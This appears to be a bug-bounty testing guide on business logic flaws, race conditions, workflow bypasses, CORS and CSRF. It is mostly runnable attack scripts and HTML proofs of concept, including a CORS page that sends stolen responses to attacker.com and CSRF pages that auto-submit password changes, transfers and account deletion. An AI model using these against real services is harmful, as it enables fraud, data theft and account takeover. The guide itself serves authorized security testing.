Web VAPT & Bug Bounty Notes#
Business Logic Exploits#
Exploit flaws in application logic and workflow design to manipulate business processes, bypass intended restrictions, or abuse functionality for unintended outcomes.
E-commerce platforms, fintech applications, subscription services, and crypto/Web3 applications present rich business logic vulnerabilities. Focus on race conditions, workflow bypasses, and economic attacks.
Parameter Manipulation#
# Price manipulation
# Original request:
POST /api/checkout HTTP/1.1
Content-Type: application/json
{"item_id":"123","quantity":1,"price":100.00}
# Attacks:
{"item_id":"123","quantity":1,"price":-100.00} # Negative price
{"item_id":"123","quantity":1,"price":0.01} # Near-zero price
{"item_id":"123","quantity":1,"price":"100"} # String vs number confusion
# Quantity manipulation
{"item_id":"123","quantity":-1,"price":100.00} # Negative quantity (refund?)
{"item_id":"123","quantity":999999,"price":100.00} # Very large quantity (limit check; try 2147483648 to probe 32-bit integer overflow)
{"item_id":"123","quantity":0,"price":100.00} # Zero quantity (free item?)
{"item_id":"123","quantity":0.5,"price":100.00} # Float quantity
# Discount abuse
# Apply multiple discount codes
POST /api/apply-discount HTTP/1.1
Content-Type: application/json
{"order_id":"456","discount_code":"SAVE10"}
{"order_id":"456","discount_code":"SAVE20"}
{"order_id":"456","discount_code":"SAVE30"}
# Check if all discounts stack
# Use expired/invalid codes
{"order_id":"456","discount_code":"EXPIRED2019"}
{"order_id":"456","discount_code":"INVALID"}
# Discount code enumeration
# Read one candidate code per line; `read -r` avoids the word-splitting and
# glob expansion that `for code in $(cat ...)` applies to each entry.
while IFS= read -r code; do
    curl -s -X POST "http://target.com/api/apply-discount" \
        -H "Content-Type: application/json" \
        -d "{\"order_id\":\"456\",\"discount_code\":\"$code\"}"
done < discount_codes.txt
# Boolean manipulation (privilege fields)
POST /api/user/register HTTP/1.1
Content-Type: application/json
{"username":"test","email":"test@test.com","is_premium":false}
# Try: {"username":"test","email":"test@test.com","is_premium":true}
{"is_admin":false} → {"is_admin":true}
{"user_type":"normal"} → {"user_type":"premium"}
{"role":"user"} → {"role":"admin"}
{"verified":false} → {"verified":true}
# Currency manipulation
{"amount":100,"currency":"USD"}
# Try: {"amount":100,"currency":"JPY"} # 100 JPY = ~$0.67
# Try: {"amount":100,"currency":""} # No currency
# Try: {"amount":100,"currency":"ABC"} # Invalid currency
# Subscription tier manipulation
POST /api/subscribe HTTP/1.1
Content-Type: application/json
{"plan":"basic","price":9.99}
# Try: {"plan":"enterprise","price":9.99}
# Credit/points manipulation
{"credits_to_use":10} → {"credits_to_use":-10} # Gain credits?
{"points":100} → {"points":999999} # Overflow
{"wallet_balance":50.00} → {"wallet_balance":5000.00}
# OPSEC: Automated parameter fuzzing
cat > parameter_fuzzer.py << 'EOF'
#!/usr/bin/env python3
import requests
import json
import sys
def fuzz_parameters(url, base_payload, token):
    """Replay ``base_payload`` against ``url`` with tampered business-logic fields.

    Three passes are made, each overriding a single field on a copy of the
    base payload: ``price``, ``quantity``, and a list of privilege-style
    fields set to ``True``. Every 200/201 response is reported on stdout.

    Args:
        url: Endpoint that receives the JSON POST.
        base_payload: Dict with the legitimate request body; it is not mutated.
        token: Bearer token sent in the ``Authorization`` header.
    """
    print("[*] Fuzzing business logic parameters")
    # Built once up front: all three passes need the same headers.
    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }

    def send(field, value):
        """POST the base payload with ``field`` overridden; return None on a request error."""
        payload = base_payload.copy()
        payload[field] = value
        try:
            return requests.post(url, json=payload, headers=headers, timeout=5)
        except requests.RequestException as e:
            print(f"[-] Error with {field}={value}: {e}")
            return None

    # Price manipulation tests
    price_tests = [
        -100, -1, -0.01, 0, 0.01, 1, 999999, -999999,
        "0", "-1", "abc", "null", "", None
    ]
    for price in price_tests:
        r = send('price', price)
        # Compare against None explicitly: a Response is falsy for 4xx/5xx.
        if r is None or r.status_code not in (200, 201):
            continue
        print(f"[+] SUCCESS with price={price}")
        print(f" Response: {r.text[:200]}")
        # Check if order was created with manipulated price
        if 'order_id' in r.text or 'success' in r.text.lower():
            print(f"[!] CRITICAL: Order created with price={price}")

    # Quantity manipulation
    quantity_tests = [-1, -10, 0, 999999, -999999, 0.5]
    for qty in quantity_tests:
        r = send('quantity', qty)
        if r is not None and r.status_code in (200, 201):
            print(f"[+] SUCCESS with quantity={qty}")

    # Boolean privilege escalation
    privilege_fields = [
        'is_admin', 'is_premium', 'is_verified',
        'admin', 'premium', 'verified',
        'role', 'user_type', 'access_level'
    ]
    for field in privilege_fields:
        r = send(field, True)
        if r is None or r.status_code not in (200, 201):
            continue
        print(f"[+] SUCCESS with {field}=True")
        # Heuristic only: the field name being echoed back does not prove the
        # value was honoured, so confirm manually.
        if field in r.text.lower():
            print(f"[!] CRITICAL: Privilege escalation via {field}")
if __name__ == "__main__":
    # CLI entry point: <url> <payload_json> <token>
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <url> <payload_json> <token>")
        print(f"Example: {sys.argv[0]} http://api.com/order '{{\"item\":\"123\"}}' token")
        sys.exit(1)
    url = sys.argv[1]
    try:
        payload = json.loads(sys.argv[2])
    except json.JSONDecodeError as e:
        sys.exit(f"[-] Invalid payload JSON: {e}")
    # The fuzzer overrides keys on the payload, so it must be a JSON object.
    if not isinstance(payload, dict):
        sys.exit("[-] Payload must be a JSON object")
    token = sys.argv[3]
    fuzz_parameters(url, payload, token)
EOF
chmod +x parameter_fuzzer.py
Race Conditions#
# Race condition exploitation (parallel requests)
# Scenario 1: Concurrent purchase of limited items
# If only 1 item is in stock, send many simultaneous purchase requests (the script below fires 20)
cat > race_condition_purchase.sh << 'EOF'
#!/bin/bash
# Usage: ./race_condition_purchase.sh http://target.com/api/purchase token item_id
# Sends $threads identical purchase requests in parallel and waits for all of them.
if [ "$#" -lt 3 ]; then
    echo "Usage: $0 <url> <token> <item_id>" >&2
    exit 1
fi
url="$1"
token="$2"
item_id="$3"
threads=20
echo "[*] Starting race condition attack with $threads threads"
# Function to make purchase request (backgrounded so the requests overlap)
purchase() {
    # --max-time keeps one stalled connection from blocking the final `wait` forever
    curl -s --max-time 10 -X POST "$url" \
        -H "Authorization: Bearer $token" \
        -H "Content-Type: application/json" \
        -d "{\"item_id\":\"$item_id\",\"quantity\":1}" &
}
# Fire all requests simultaneously
for i in $(seq 1 "$threads"); do
    purchase
done
wait
echo "[*] All requests completed. Check your orders."
EOF
chmod +x race_condition_purchase.sh
# Scenario 2: Account balance race condition
# Withdraw $100 from account with only $100 balance multiple times
cat > race_condition_balance.py << 'EOF'
#!/usr/bin/env python3
import requests
import threading
import sys
def withdraw(url, token, amount, results):
    """POST one withdrawal request and record its HTTP status code.

    Args:
        url: Withdrawal endpoint.
        token: Bearer token for the ``Authorization`` header.
        amount: Value sent as the ``amount`` field of the JSON body.
        results: Shared list; the response status code is appended to it.
            Nothing is appended when the request itself fails.
    """
    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }
    payload = {'amount': amount}
    try:
        r = requests.post(url, json=payload, headers=headers, timeout=5)
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return
    results.append(r.status_code)
    if r.status_code in [200, 201]:
        print(f"[+] Withdrawal successful: {r.text[:100]}")
if __name__ == "__main__":
    # CLI entry point: <url> <token> <amount>
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <url> <token> <amount>")
        sys.exit(1)
    url = sys.argv[1]
    token = sys.argv[2]
    try:
        amount = float(sys.argv[3])
    except ValueError:
        sys.exit(f"[-] Amount must be a number, got: {sys.argv[3]}")
    # Single source of truth for the request count (used for the banner and the loop).
    attempts = 10
    results = []
    print(f"[*] Starting race condition attack: withdrawing ${amount} x {attempts}")
    # Create every thread first so the start calls happen back to back.
    threads = [
        threading.Thread(target=withdraw, args=(url, token, amount, results))
        for _ in range(attempts)
    ]
    # Start all threads at once
    for t in threads:
        t.start()
    # Wait for completion
    for t in threads:
        t.join()
    successes = sum(1 for r in results if r in [200, 201])
    print(f"\n[*] Results: {successes} successful withdrawals")
    if successes > 1:
        print("[!] RACE CONDITION VULNERABILITY: Multiple withdrawals succeeded!")
EOF
chmod +x race_condition_balance.py
python3 race_condition_balance.py http://api.com/withdraw token 100
# Scenario 3: Coupon/gift card race condition
# Use same gift card code multiple times simultaneously
cat > race_condition_coupon.py << 'EOF'
#!/usr/bin/env python3
import requests
import threading
import sys
import time
class CouponRace:
    """Redeems one coupon code from several threads at once and counts successes.

    Attributes:
        url: Redemption endpoint.
        coupon_code: Code sent as ``coupon_code`` in every request.
        num_threads: Upper bound on the number of tokens (threads) used.
        success_count: Number of 200/201 responses seen so far.
        lock: Guards ``success_count`` across worker threads.
    """

    def __init__(self, url, coupon_code, num_threads=20):
        self.url = url
        self.coupon_code = coupon_code
        self.num_threads = num_threads
        self.success_count = 0
        self.lock = threading.Lock()

    def redeem(self, session_token):
        """POST a single redemption using ``session_token`` as the bearer token."""
        headers = {
            'Authorization': f'Bearer {session_token}',
            'Content-Type': 'application/json'
        }
        payload = {'coupon_code': self.coupon_code}
        try:
            r = requests.post(self.url, json=payload, headers=headers, timeout=5)
        except requests.RequestException as e:
            # Report failures so they are not mistaken for rejected redemptions.
            print(f"[-] Error: {e}")
            return
        if r.status_code in [200, 201]:
            with self.lock:
                self.success_count += 1
                print(f"[+] Redemption #{self.success_count} successful")

    def attack(self, tokens):
        """Run one ``redeem`` thread per token, using at most ``num_threads`` tokens."""
        threads = [
            threading.Thread(target=self.redeem, args=(token,))
            for token in tokens[:self.num_threads]
        ]
        # Print the real thread count, which is lower when fewer tokens are given.
        print(f"[*] Starting race condition with {len(threads)} threads")
        # Start all threads simultaneously
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        print(f"\n[*] Attack complete. {self.success_count} successful redemptions")
        if self.success_count > 1:
            print("[!] VULNERABILITY: Coupon redeemed multiple times!")
if __name__ == "__main__":
    # CLI entry point: <url> <coupon_code> [tokens_file]
    if len(sys.argv) < 3:
        # The tokens file is optional, so the usage line marks it as such.
        print(f"Usage: {sys.argv[0]} <url> <coupon_code> [tokens_file]")
        sys.exit(1)
    url = sys.argv[1]
    coupon = sys.argv[2]
    # Load multiple session tokens (create multiple accounts)
    tokens = []
    if len(sys.argv) > 3:
        with open(sys.argv[3]) as f:
            # Skip blank lines so they do not become empty bearer tokens.
            tokens = [line.strip() for line in f if line.strip()]
    else:
        # Use same token multiple times
        tokens = ['YOUR_TOKEN'] * 20
    race = CouponRace(url, coupon, num_threads=len(tokens))
    race.attack(tokens)
EOF
chmod +x race_condition_coupon.py
# Scenario 4: Voting/rating race condition
# Vote multiple times on same item
# $token must already hold a valid bearer token in the calling shell.
for i in {1..100}; do
    # Without an explicit Content-Type, curl -d sends the JSON body as
    # application/x-www-form-urlencoded.
    curl -s -X POST "http://target.com/api/vote" \
        -H "Authorization: Bearer $token" \
        -H "Content-Type: application/json" \
        -d '{"item_id":"123","vote":"upvote"}' &
done
wait
# OPSEC: Advanced race condition with precise timing
cat > precise_race_condition.py << 'EOF'
#!/usr/bin/env python3
import requests
import threading
import time
class PreciseRaceCondition:
    """Releases N identical POST requests together using a thread barrier.

    Attributes:
        url: Target endpoint.
        token: Bearer token for the ``Authorization`` header.
        threads: Number of worker threads (and barrier parties).
        timeout: Per-request timeout in seconds.
        barrier: ``threading.Barrier`` every worker waits on before sending.
        results: One dict per finished request, either
            ``{'status', 'time', 'response'}`` or ``{'error'}``.
    """

    def __init__(self, url, token, threads=10, timeout=10):
        self.url = url
        self.token = token
        self.threads = threads
        # Without a timeout one stalled request would block join() forever.
        self.timeout = timeout
        self.barrier = threading.Barrier(threads)
        self.results = []

    def make_request(self, payload):
        """Wait at the barrier, POST ``payload`` as JSON, then record the outcome."""
        # Wait at barrier for all threads to be ready
        self.barrier.wait()
        headers = {
            'Authorization': f'Bearer {self.token}',
            'Content-Type': 'application/json'
        }
        try:
            start = time.time()
            r = requests.post(self.url, json=payload, headers=headers,
                              timeout=self.timeout)
            end = time.time()
        except requests.RequestException as e:
            self.results.append({'error': str(e)})
            return
        self.results.append({
            'status': r.status_code,
            'time': end - start,
            'response': r.text[:200]
        })

    def execute(self, payload):
        """Run ``self.threads`` workers with ``payload``, print a summary, return results."""
        print(f"[*] Preparing {self.threads} threads for simultaneous execution")
        workers = []
        for _ in range(self.threads):
            t = threading.Thread(target=self.make_request, args=(payload,))
            workers.append(t)
            t.start()
        for t in workers:
            t.join()
        # Analyze results
        successes = sum(1 for r in self.results if r.get('status') in [200, 201])
        print(f"\n[*] Results:")
        print(f" Successful requests: {successes}/{self.threads}")
        # Average only requests that completed. Failed ones carry no timing
        # and would otherwise drag the mean towards zero.
        timings = [r['time'] for r in self.results if 'time' in r]
        if timings:
            print(f" Average response time: {sum(timings) / len(timings):.3f}s")
        if successes > 1:
            print(f"[!] RACE CONDITION: {successes} concurrent operations succeeded")
        return self.results
# Example usage
if __name__ == "__main__":
    # Placeholder target and token: replace before running.
    race = PreciseRaceCondition(
        url="http://target.com/api/purchase",
        token="YOUR_TOKEN",
        threads=20
    )
    payload = {
        "item_id": "limited_item_123",
        "quantity": 1
    }
    race.execute(payload)
EOF
chmod +x precise_race_condition.py
Workflow Bypasses#
# E-commerce flow bypass
# Normal flow:
# 1. Add to Cart
# 2. Enter Shipping Info
# 3. Enter Payment Info
# 4. Review Order
# 5. Confirm Purchase
# Attack: Skip payment step
# After step 2 (shipping), directly go to step 5 (confirm)
POST /api/order/confirm HTTP/1.1
Content-Type: application/json
{
"order_id":"12345",
"shipping_address":"123 Main St",
"payment_status":"completed" # Manually set as completed
}
# Multi-step registration bypass
# Normal: Step 1 → Step 2 → Step 3 → Complete
# Attack: Direct to Complete with minimal data
POST /api/register/complete HTTP/1.1
Content-Type: application/json
{
"step":3,
"email":"test@test.com",
"verified":true # Skip email verification
}
# Password reset bypass
# Normal: Request Reset → Email Link → New Password
# Attack: Direct to reset with guessed/enumerated token
GET /reset-password?token=000000 HTTP/1.1
# Try sequential tokens: 000001, 000002, etc.
# Or predict token pattern:
# If token = md5(email + timestamp)
# Calculate: md5("victim@target.com" + "recent_timestamp")
# Account verification bypass
# Skip email verification by manipulating state
POST /api/account/update HTTP/1.1
Content-Type: application/json
{
"email":"test@test.com",
"email_verified":true # Manually verify
}
# Payment verification bypass
# Mark order as paid without actual payment
POST /api/order/123/status HTTP/1.1
Content-Type: application/json
{
"payment_status":"paid",
"payment_method":"credit_card"
}
# Subscription cancellation bypass
# If cancellation requires multiple steps, skip to final
POST /api/subscription/cancel/confirm HTTP/1.1
Content-Type: application/json
{
"subscription_id":"sub_123",
"confirmed":true,
"skip_survey":true
}
# OPSEC: Workflow enumeration
cat > workflow_enum.py << 'EOF'
#!/usr/bin/env python3
import requests
import json
def enumerate_workflow_steps(base_url, token, max_steps=10):
    """Enumerate numbered workflow endpoints, then try jumping to the last one.

    Each URL pattern is requested with GET for steps ``1..max_steps``, and
    every 200 response is recorded. If anything was found, the endpoint with
    the highest step number receives a POST that claims the step is complete.

    Args:
        base_url: Scheme and host prefix that the patterns are appended to.
        token: Bearer token for the ``Authorization`` header.
        max_steps: Highest step number to probe.

    Returns:
        List of dicts with ``url``, ``step`` and ``response`` (first 200
        characters of the body) for each endpoint that answered 200.
    """
    print("[*] Enumerating workflow steps")
    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }
    endpoints = []
    # Try different step patterns
    patterns = [
        "/api/workflow/step/{step}",
        "/api/process/{step}",
        "/api/register/step{step}",
        "/api/checkout/step-{step}",
        "/api/order/{step}"
    ]
    for pattern in patterns:
        for step in range(1, max_steps + 1):
            url = base_url + pattern.format(step=step)
            try:
                r = requests.get(url, headers=headers, timeout=5)
            except requests.RequestException:
                # Unreachable candidates are expected during enumeration.
                continue
            if r.status_code == 200:
                print(f"[+] Found step: {url}")
                endpoints.append({
                    'url': url,
                    'step': step,
                    'response': r.text[:200]
                })
    # Try to skip to final step
    if endpoints:
        # Reuse the URL that actually answered. Rebuilding it from the first
        # pattern would hit the wrong path when another pattern matched.
        final = max(endpoints, key=lambda e: e['step'])
        final_step = final['step']
        final_url = final['url']
        print(f"\n[*] Testing direct access to final step: {final_url}")
        payload = {
            'step': final_step,
            'completed': True,
            'skip_validation': True
        }
        try:
            r = requests.post(final_url, json=payload, headers=headers, timeout=5)
            if r.status_code in [200, 201]:
                print(f"[!] BYPASS: Direct access to final step succeeded!")
                print(f" Response: {r.text[:200]}")
        except requests.RequestException as e:
            print(f"[-] Error: {e}")
    return endpoints
if __name__ == "__main__":
    # Placeholder target and token: replace before running.
    enumerate_workflow_steps(
        "http://target.com",
        "YOUR_TOKEN"
    )
EOF
chmod +x workflow_enum.py
Logic Flaw Testing#
# Automated business logic testing script
cat > business_logic_tester.py << 'EOF'
#!/usr/bin/env python3
import requests
import json
import sys
import time
class BusinessLogicTester:
    """Sends malformed values to JSON endpoints and collects accepted ones.

    Attributes:
        base_url: Prefix prepended to every endpoint path.
        token: Bearer token used for all requests.
        headers: Authorization and content-type headers sent with each POST.
        vulnerabilities: Findings recorded by the ``test_*`` methods, one
            dict per finding.
    """

    def __init__(self, base_url, token):
        self.base_url = base_url
        self.token = token
        self.headers = {
            'Authorization': f'Bearer {token}',
            'Content-Type': 'application/json'
        }
        self.vulnerabilities = []

    def _post(self, endpoint, payload):
        """POST ``payload`` as JSON; return the response, or None on a request error."""
        try:
            return requests.post(
                f"{self.base_url}{endpoint}",
                json=payload,
                headers=self.headers,
                timeout=5
            )
        except requests.RequestException as e:
            print(f"[-] Request to {endpoint} failed: {e}")
            return None

    def _probe_values(self, kind, label, endpoint, field, values):
        """Send each value in ``field``; record every one answered with 200/201."""
        for value in values:
            r = self._post(endpoint, {field: value})
            if r is not None and r.status_code in [200, 201]:
                print(f"[!] VULNERABILITY: {label} accepted: {value}")
                self.vulnerabilities.append({
                    'type': kind,
                    'endpoint': endpoint,
                    'field': field,
                    'value': value
                })

    def _print_statuses(self, endpoint, field, values, show_type=False):
        """Send each value in ``field`` and print the status code (nothing is recorded)."""
        for value in values:
            r = self._post(endpoint, {field: value})
            if r is None:
                continue
            if show_type:
                print(f" {field}={value} (type: {type(value).__name__}): Status {r.status_code}")
            else:
                print(f" {field}={value}: Status {r.status_code}")

    def test_negative_values(self, endpoint, field):
        """Test negative value handling"""
        print(f"\n[*] Testing negative values on {endpoint}")
        self._probe_values('negative_value', 'Negative value', endpoint, field,
                           [-1, -10, -100, -999999])

    def test_overflow(self, endpoint, field):
        """Test integer overflow"""
        print(f"\n[*] Testing overflow on {endpoint}")
        overflow_values = [
            999999999,
            2147483647,  # Max 32-bit int
            2147483648,  # Max + 1
            9999999999999
        ]
        self._probe_values('overflow', 'Overflow value', endpoint, field,
                           overflow_values)

    def test_boundary_values(self, endpoint, field, min_val=0, max_val=100):
        """Test boundary values"""
        print(f"\n[*] Testing boundary values on {endpoint}")
        boundary_values = [
            min_val - 1,
            min_val,
            min_val + 1,
            max_val - 1,
            max_val,
            max_val + 1
        ]
        self._print_statuses(endpoint, field, boundary_values)

    def test_missing_parameters(self, endpoint, required_params):
        """Test with missing required parameters"""
        print(f"\n[*] Testing missing parameters on {endpoint}")
        for param in required_params:
            # Create payload without this parameter
            payload = {p: "test" for p in required_params if p != param}
            r = self._post(endpoint, payload)
            if r is not None and r.status_code in [200, 201]:
                print(f"[!] VULNERABILITY: Request succeeded without '{param}'")
                self.vulnerabilities.append({
                    'type': 'missing_parameter',
                    'endpoint': endpoint,
                    'missing_param': param
                })

    def test_type_confusion(self, endpoint, field):
        """Test type confusion (string vs int vs bool)"""
        print(f"\n[*] Testing type confusion on {endpoint}")
        test_values = [
            100,             # int
            "100",           # string
            True,            # boolean
            [100],           # array
            {"value": 100},  # object
            None,            # null
            "null",          # string "null"
            "",              # empty string
        ]
        self._print_statuses(endpoint, field, test_values, show_type=True)

    def generate_report(self):
        """Print all findings and write them to ``business_logic_report.json``."""
        print("\n" + "="*60)
        print("BUSINESS LOGIC VULNERABILITY REPORT")
        print("="*60)
        if not self.vulnerabilities:
            print("\n[+] No vulnerabilities detected")
        else:
            print(f"\n[!] Found {len(self.vulnerabilities)} vulnerabilities:\n")
            for i, vuln in enumerate(self.vulnerabilities, 1):
                details = {k: v for k, v in vuln.items() if k not in ['type', 'endpoint']}
                print(f"{i}. {vuln['type'].upper()}")
                print(f" Endpoint: {vuln['endpoint']}")
                print(f" Details: {json.dumps(details, indent=6)}")
                print()
        # Save to file
        with open('business_logic_report.json', 'w', encoding='utf-8') as f:
            json.dump(self.vulnerabilities, f, indent=2)
        print("[*] Report saved to: business_logic_report.json")
# Example usage
if __name__ == "__main__":
    # CLI entry point: <base_url> <token>
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <base_url> <token>")
        sys.exit(1)
    tester = BusinessLogicTester(sys.argv[1], sys.argv[2])
    # Test various endpoints
    tester.test_negative_values('/api/purchase', 'price')
    tester.test_negative_values('/api/purchase', 'quantity')
    tester.test_overflow('/api/purchase', 'quantity')
    tester.test_boundary_values('/api/purchase', 'quantity', 0, 100)
    tester.test_missing_parameters('/api/purchase', ['item_id', 'quantity', 'price'])
    tester.test_type_confusion('/api/purchase', 'price')
    tester.generate_report()
EOF
chmod +x business_logic_tester.py
python3 business_logic_tester.py http://target.com YOUR_TOKEN
Advanced Attacks#
Cross-Origin Resource Sharing (CORS) Misconfiguration#
bash
# CORS Misconfiguration Testing
# Test 1: Reflected Origin (most critical)
GET /api/sensitive HTTP/1.1
Host: vulnerable.com
Origin: https://evil.com
# Look for response:
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true
# If both present = CRITICAL vulnerability
# Test 2: Null Origin
GET /api/sensitive HTTP/1.1
Host: vulnerable.com
Origin: null
# Check if:
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
# Test 3: Wildcard with credentials (misconfiguration)
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
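# Browsers reject this combination (a wildcard ACAO is not honoured for credentialed requests), so it is not directly exploitable, but it signals a careless CORS policy worth probing further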
# Test 4: Subdomain bypass
Origin: https://evil.vulnerable.com
Origin: https://vulnerableevil.com
Origin: https://vulnerable.com.evil.com
# Test 5: Regex bypass (if origin validation uses regex)
Origin: https://vulnerableXcom # Matches if the regex leaves the dot unescaped: /vulnerable.com/
Origin: https://vulnerable.com.evil.com
# OPSEC: Automated CORS testing
cat > cors_scanner.py << 'EOF'
#!/usr/bin/env python3
import requests
import sys
def test_cors(url, sensitive_endpoint='/api/user/profile'):
    """Test CORS misconfigurations

    Sends GET requests to ``url + sensitive_endpoint`` with a series of
    ``Origin`` headers and inspects the ``Access-Control-Allow-Origin`` and
    ``Access-Control-Allow-Credentials`` response headers. When at least one
    finding exists, a PoC page is generated for the first one.

    Args:
        url: Base URL of the target (scheme and host).
        sensitive_endpoint: Path of an authenticated endpoint to probe.

    Returns:
        List of dicts with the probing ``origin`` and the finding ``type``.
    """
    from urllib.parse import urlsplit

    print(f"[*] Testing CORS on {url}{sensitive_endpoint}")
    # Use only the host part. A plain split on "//" keeps any path and fails
    # when the URL has no scheme.
    host = urlsplit(url).netloc or url.split("//")[-1].split("/")[0]
    test_origins = [
        'https://evil.com',
        'https://attacker.com',
        'null',
        'http://localhost',
        f'https://evil.{host}',
        f'https://{host}.evil.com'
    ]
    vulnerabilities = []
    for origin in test_origins:
        headers = {'Origin': origin}
        try:
            r = requests.get(url + sensitive_endpoint, headers=headers, timeout=5)
        except requests.RequestException as e:
            print(f"[-] Error testing {origin}: {e}")
            continue
        acao = r.headers.get('Access-Control-Allow-Origin', '')
        acac = r.headers.get('Access-Control-Allow-Credentials', '')
        print(f"\n[*] Testing Origin: {origin}")
        print(f" Access-Control-Allow-Origin: {acao}")
        print(f" Access-Control-Allow-Credentials: {acac}")
        # Check for vulnerabilities (all findings require credentials to be allowed)
        if acac.lower() != 'true':
            continue
        # 'null' is checked before plain reflection, otherwise the null-origin
        # probe would be reported as a reflected origin.
        if acao == 'null':
            print(f"[!] HIGH: Null origin with credentials!")
            vulnerabilities.append({
                'origin': origin,
                'type': 'null_origin_with_creds'
            })
        elif acao == '*':
            print(f"[!] CRITICAL: Wildcard with credentials!")
            vulnerabilities.append({
                'origin': origin,
                'type': 'wildcard_with_creds'
            })
        elif acao == origin:
            print(f"[!] CRITICAL: Reflected origin with credentials!")
            vulnerabilities.append({
                'origin': origin,
                'type': 'reflected_origin_with_creds'
            })
    if vulnerabilities:
        print(f"\n[!] Found {len(vulnerabilities)} CORS vulnerabilities")
        generate_poc(url, sensitive_endpoint, vulnerabilities[0])
    else:
        print("\n[+] No CORS vulnerabilities detected")
    return vulnerabilities
def generate_poc(target_url, endpoint, vuln):
    """Generate CORS exploitation PoC

    Writes ``cors_poc.html`` to the current directory. The page issues a
    credentialed GET to ``target_url + endpoint`` and displays the response.

    Args:
        target_url: Base URL interpolated into the page title and request URL.
        endpoint: Path appended to ``target_url`` for the request.
        vuln: Finding dict; accepted for interface compatibility but not used
            by the template.
    """
    poc_html = f"""<!DOCTYPE html>
<html>
<head>
<title>CORS PoC - {target_url}</title>
</head>
<body>
<h1>CORS Exploitation PoC</h1>
<div id="output"></div>
<script>
// CORS exploit to steal sensitive data
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {{
if (xhr.readyState == 4 && xhr.status == 200) {{
// Display stolen data
document.getElementById('output').innerHTML =
'<h2>Stolen Data:</h2><pre>' + xhr.responseText + '</pre>';
// Exfiltrate to attacker server
fetch('https://attacker.com/steal', {{
method: 'POST',
body: xhr.responseText
}});
}}
}};
xhr.open('GET', '{target_url}{endpoint}', true);
xhr.withCredentials = true; // Include cookies
xhr.send();
</script>
</body>
</html>"""
    # Explicit encoding keeps the output identical across platforms.
    with open('cors_poc.html', 'w', encoding='utf-8') as f:
        f.write(poc_html)
    print(f"\n[+] PoC saved to: cors_poc.html")
    print(f"[+] Host this file and have victim visit it")
if __name__ == "__main__":
    # CLI entry point: <target_url>
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        sys.exit(1)
    test_cors(sys.argv[1])
EOF
chmod +x cors_scanner.py
python3 cors_scanner.py https://target.com
Cross-Site Request Forgery (CSRF)#
# CSRF Detection and Exploitation
# Step 1: Identify state-changing requests
POST /change-password HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: session=abc123
current_password=old123&new_password=new456
# Step 2: Check for CSRF protections
# - CSRF tokens in forms/headers
# - SameSite cookie attributes
# - Referer/Origin header validation
# - Custom headers requirement
# Step 3: Test for bypasses
# Bypass 1: Remove CSRF token
POST /change-password HTTP/1.1
# ... (without CSRF token)
# Bypass 2: Use invalid CSRF token
csrf_token=invalid
# Bypass 3: Use another user's CSRF token
csrf_token=ANOTHER_USER_TOKEN
# Bypass 4: Change request method (if poorly implemented)
GET /change-password?new_password=hacked
# Bypass 5: Change Content-Type
Content-Type: application/json
Content-Type: text/plain
Content-Type: multipart/form-data
# CSRF PoC generation (Burp Suite method)
# Right-click request → Engagement Tools → Generate CSRF PoC
# Manual CSRF PoC (form-based)
cat > csrf_poc.html << 'EOF'
<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<h1>Loading...</h1>
<form action="https://target.com/change-password" method="POST" id="csrf-form">
<input type="hidden" name="new_password" value="hacked123">
</form>
<script>
// Auto-submit form when page loads
document.getElementById('csrf-form').submit();
</script>
</body>
</html>
EOF
# CSRF with JSON payload
cat > csrf_json_poc.html << 'EOF'
<!DOCTYPE html>
<html>
<head>
<title>CSRF JSON PoC</title>
</head>
<body>
<h1>Loading...</h1>
<script>
// CSRF with JSON via XMLHttpRequest
var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://target.com/api/change-email', true);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.withCredentials = true; // Include cookies
xhr.send('{"email":"attacker@evil.com"}');
</script>
</body>
</html>
EOF
# CSRF with Fetch API (modern)
cat > csrf_fetch_poc.html << 'EOF'
<!DOCTYPE html>
<html>
<body>
<script>
fetch('https://target.com/api/transfer', {
method: 'POST',
credentials: 'include', // Include cookies
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify({
to: 'attacker',
amount: 1000
})
});
</script>
</body>
</html>
EOF
# Bypassing SameSite=Lax (2025 techniques)
# SameSite=Lax still sends cookies on cross-site top-level GET navigations
# If application accepts GET for state-changing:
cat > csrf_samesite_bypass.html << 'EOF'
<!DOCTYPE html>
<html>
<body>
<!-- SameSite=Lax bypass via top-level navigation -->
<script>
// Method 1: Direct navigation (allows cookies)
window.location = 'https://target.com/delete-account?confirm=true';
// Method 2: Use form with GET method
// <form action="https://target.com/delete-account" method="GET">
// <input name="confirm" value="true">
// </form>
</script>
</body>
</html>
EOF
# Bypassing Referer validation
# If server checks Referer header
# Method 1: Suppress Referer
<meta name="referrer" content="no-referrer">
# Method 2: Match domain in Referer
# Host PoC at: target.com.evil.com
# Or: evil.com/target.com/csrf.html
# OPSEC: Automated CSRF testing
cat > csrf_tester.py << 'EOF'
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
import sys
def find_csrf_vulnerabilities(base_url, authenticated_session):
    """Test endpoints for CSRF vulnerabilities

    Fetches a fixed list of pages, looks for POST forms with no input whose
    name contains ``csrf``, records them, and then submits each such form
    with placeholder values.

    NOTE: the confirmation step really submits the form (every named input is
    set to ``'test'``), so it can change state on the target.

    Args:
        base_url: Scheme and host prefix the page paths are appended to.
        authenticated_session: Dict of cookies added to the session.

    Returns:
        List of dicts with ``url``, ``method`` and ``has_csrf_token`` for
        each form flagged.
    """
    from urllib.parse import urljoin

    print(f"[*] Testing {base_url} for CSRF vulnerabilities")
    session = requests.Session()
    session.cookies.update(authenticated_session)
